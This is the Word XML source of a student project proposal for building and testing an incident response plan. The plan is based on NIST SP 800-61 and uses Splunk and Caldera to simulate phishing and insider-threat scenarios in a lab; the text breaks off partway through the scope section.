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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="672A6659" wp14:textId="77777777">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>TOC \o "1-3" \h \z \u</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="1AD10196" w:rsidP="732EE1AE" w:rsidRDefault="1AD10196" w14:paraId="58609F32" w14:textId="252A5311">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="1AD10196">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Development and Testing of a Comprehensive Incident Response Plan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="449784E7" w:rsidP="732EE1AE" w:rsidRDefault="449784E7" w14:paraId="71ED0D04" w14:textId="233BABC5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="449784E7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Team Members</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="449784E7" w:rsidP="732EE1AE" w:rsidRDefault="449784E7" w14:paraId="4137C698" w14:textId="7EFA6078">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="449784E7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shehab Elden Hesham Hanafy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="449784E7" w:rsidP="732EE1AE" w:rsidRDefault="449784E7" w14:paraId="0BB59E32" w14:textId="5BC4D505">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="449784E7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Momen </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="02A32117">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahmed Abdelhady </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02A32117" w:rsidP="732EE1AE" w:rsidRDefault="02A32117" w14:paraId="7508CF68" w14:textId="7826C9CF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="02A32117">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Abdelfatah Mostafa Yahya</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02A32117" w:rsidP="732EE1AE" w:rsidRDefault="02A32117" w14:paraId="0AF6B6D6" w14:textId="58AFDD3C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="02A32117">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Zyad Sobhy Amin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02A32117" w:rsidP="732EE1AE" w:rsidRDefault="02A32117" w14:paraId="7C9A9157" w14:textId="1D201771">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="02A32117">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Osama Hassan Yossef </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="5F64816D" w14:textId="24E0EA0B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="5EAFD1CB" w14:textId="2BD3844E">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>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0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In today’s evolving cyber threat landscape, organizations face persistent challenges in detecting, responding to, and recovering from security incidents. To effectively address these risks, it is crucial to </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>establish</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a well-structured, proactive, and tested </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Incident Response (IR) Plan</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="249FF403" w14:textId="5EFC45F5">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">This project, titled </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“Development and Testing of a Comprehensive Incident Response Plan,”</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 xml:space="preserve"> aims to design and </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validate</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 xml:space="preserve"> an effective response framework based on the </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NIST SP 800-61 (Computer Security Incident Handling Guide)</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 xml:space="preserve">. The project will utilize </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="7C3F3A55">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Splunk</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="7C3F3A55">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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SIEM</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 xml:space="preserve"> for monitoring and log analysis, and </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Caldera</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 xml:space="preserve"> as the attacker simulation and Command &amp; Control (C2) platform. The testing environment will include two target machines to simulate and respond to two attack scenarios — a </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Phishing Attack</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 xml:space="preserve"> and an </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Insider Threat Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="33D02273" w14:textId="277CC3E0">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>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0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">By integrating practical tools and simulation environments, this research </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>seeks</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to bridge the gap between theoretical frameworks and real-world application, ensuring that the developed plan not only aligns with best practices but also proves effective under realistic attack conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="590B7178" w14:textId="514982E3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="3A8D55F4" w14:textId="3ABB4AC3">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The main </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objectives</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of this research and development project are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="5F1229E4" w14:textId="4256A2FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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To analyze and summarize</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best practices in incident response based on NIST standards and other relevant frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="6C0586A6" w14:textId="06031326">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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To develop</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 structured and comprehensive Incident Response Plan addressing all major phases — preparation, detection, containment, eradication, recovery, and lessons learned.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="6FBA25E8" w14:textId="46AE70B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To simulate and test</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> real-world cyber incidents using </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="6A5B74E8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Splunk</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SIEM and Caldera C2 to evaluate the plan’s effectiveness.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="5CE57B53" w14:textId="20E054E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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To assess organizational readiness</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and the efficiency of the response process under phishing and insider threat scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="2CBBA382" w14:textId="5ABCF8AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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To provide recommendations</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for improving detection, communication, and recovery procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="02F9B894" w14:textId="3B8B44C8">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="7BD8C296" w14:textId="2B6614E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="01CC38EA" w14:textId="610134EF">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The scope of this project focuses on the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design, implementation, and testing</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of an Incident Response framework within a controlled lab environment. It covers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="37B08567" w14:textId="09375AE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Application of the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NIST SP 800-61</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framework as the core structure for the plan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="65BD54C9" w14:textId="1739FC66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Utilization</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
